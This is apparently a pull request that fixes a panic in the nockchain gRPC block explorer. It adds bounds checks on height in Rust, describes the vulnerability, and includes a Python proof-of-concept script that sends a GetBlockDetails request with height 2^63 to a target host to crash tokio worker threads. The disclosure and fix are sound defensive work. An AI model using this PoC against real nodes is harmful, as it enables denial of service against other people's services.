### PR TITLE
fix: validate height bounds to prevent worker thread panic

### DIFF
--- a/crates/nockapp-grpc/src/services/public_nockchain/v2/block_explorer.rs
+++ b/crates/nockapp-grpc/src/services/public_nockchain/v2/block_explorer.rs
@@ -655,6 +655,14 @@ impl BlockExplorerCache {
     ) -> GrpcResult<FullPageDetails> {
         tracing::Span::current().record("height", &tracing::field::display(height));
 
+        // Validate height to prevent panic in D() for values > DIRECT_MAX (u64::MAX >> 1)
+        const DIRECT_MAX: u64 = u64::MAX >> 1;
+        if height > DIRECT_MAX {
+            return Err(NockAppGrpcError::InvalidRequest(
+                "height exceeds maximum supported value".to_string(),
+            ));
+        }
+
         let mut path_slab = NounSlab::new();
         let tag = nockapp::utils::make_tas(&mut path_slab, "heaviest-chain-blocks-range").as_noun();
         let start_noun = nockvm::noun::D(height);
@@ -992,6 +1000,15 @@ impl BlockExplorerCache {
         height: u64,
     ) -> GrpcResult<BlockEntryWithTxs> {
         tracing::Span::current().record("height", &tracing::field::display(height));
+
+        // Validate height to prevent panic in D() for values > DIRECT_MAX (u64::MAX >> 1)
+        const DIRECT_MAX: u64 = u64::MAX >> 1;
+        if height > DIRECT_MAX {
+            return Err(NockAppGrpcError::InvalidRequest(
+                "height exceeds maximum supported value".to_string(),
+            ));
+        }
+
         let mut path_slab = NounSlab::new();
         let tag = nockapp::utils::make_tas(&mut path_slab, "heaviest-chain-blocks-range").as_noun();
         let start_noun = nockvm::noun::D(height);

--- a/poc_height_panic.py
+++ b/poc_height_panic.py
@@ -1,0 +1,30 @@
+#!/usr/bin/env python3
+# reproduce_panic.py - Minimal DIRECT_MAX panic reproducer
+import grpc
+from grpc_tools import protoc
+import subprocess, sys, tempfile, os
+
+# Generate protos and trigger panic
+PROTO_DIR = "nockchain/crates/nockapp-grpc-proto/proto"
+out = tempfile.mkdtemp()
+for p in ["nockchain/common/v1/primitives.proto", "nockchain/common/v2/blockchain.proto",
+          "nockchain/public/v2/nockchain.proto", "nockchain/common/v1/blockchain.proto",
+          "nockchain/common/v1/pagination.proto"]:
+    subprocess.run([sys.executable, "-m", "grpc_tools.protoc", f"-I{PROTO_DIR}",
+                   f"--python_out={out}", f"--grpc_python_out={out}", f"{PROTO_DIR}/{p}"],
+                   capture_output=True)
+for pkg in ["nockchain", "nockchain/common", "nockchain/common/v1", "nockchain/common/v2",
+            "nockchain/public", "nockchain/public/v2"]:
+    os.makedirs(f"{out}/{pkg}", exist_ok=True)
+    open(f"{out}/{pkg}/__init__.py", 'w').close()
+
+sys.path.insert(0, out)
+from nockchain.public.v2 import nockchain_pb2, nockchain_pb2_grpc
+
+ch = grpc.insecure_channel(sys.argv[1])
+stub = nockchain_pb2_grpc.NockchainBlockServiceStub(ch)
+try:
+    stub.GetBlockDetails(nockchain_pb2.GetBlockDetailsRequest(height=2**63))
+except grpc.RpcError as e:
+    print(f"Result: {e.code()} - triggers panic in noun.rs:220")
+


### PR DESCRIPTION
## Summary

- Adds height validation before `D()` calls in block_explorer.rs
- Prevents tokio worker thread panics caused by heights > DIRECT_MAX

## Vulnerability Details

**Location**: `crates/nockvm/rust/nockvm/src/noun.rs:220`

The `D()` function panics when given values > `DIRECT_MAX` (u64::MAX >> 1 = 9223372036854775807):

```rust
pub fn D(n: u64) -> Noun {
    if n > DIRECT_MAX {
        panic!("Number is greater than DIRECT_MAX")
    }
    // ...
}
```

**Attack Vector**: `GetBlockDetails` RPC with `height >= 2^63` reaches `D(height)` without validation.

**Impact**: 
- Tokio worker thread crash
- Repeated requests could exhaust worker pool

**Observed behavior**:
```
thread 'tokio-runtime-worker' panicked at crates/nockvm/rust/nockvm/src/noun.rs:220:13:
Number is greater than DIRECT_MAX
```

## Fix

Validates height against DIRECT_MAX before calling `D()` and returns proper gRPC error instead of panicking.

## PoC

Included as `poc_height_panic.py`:
```bash
python3 poc_height_panic.py <host:port>
```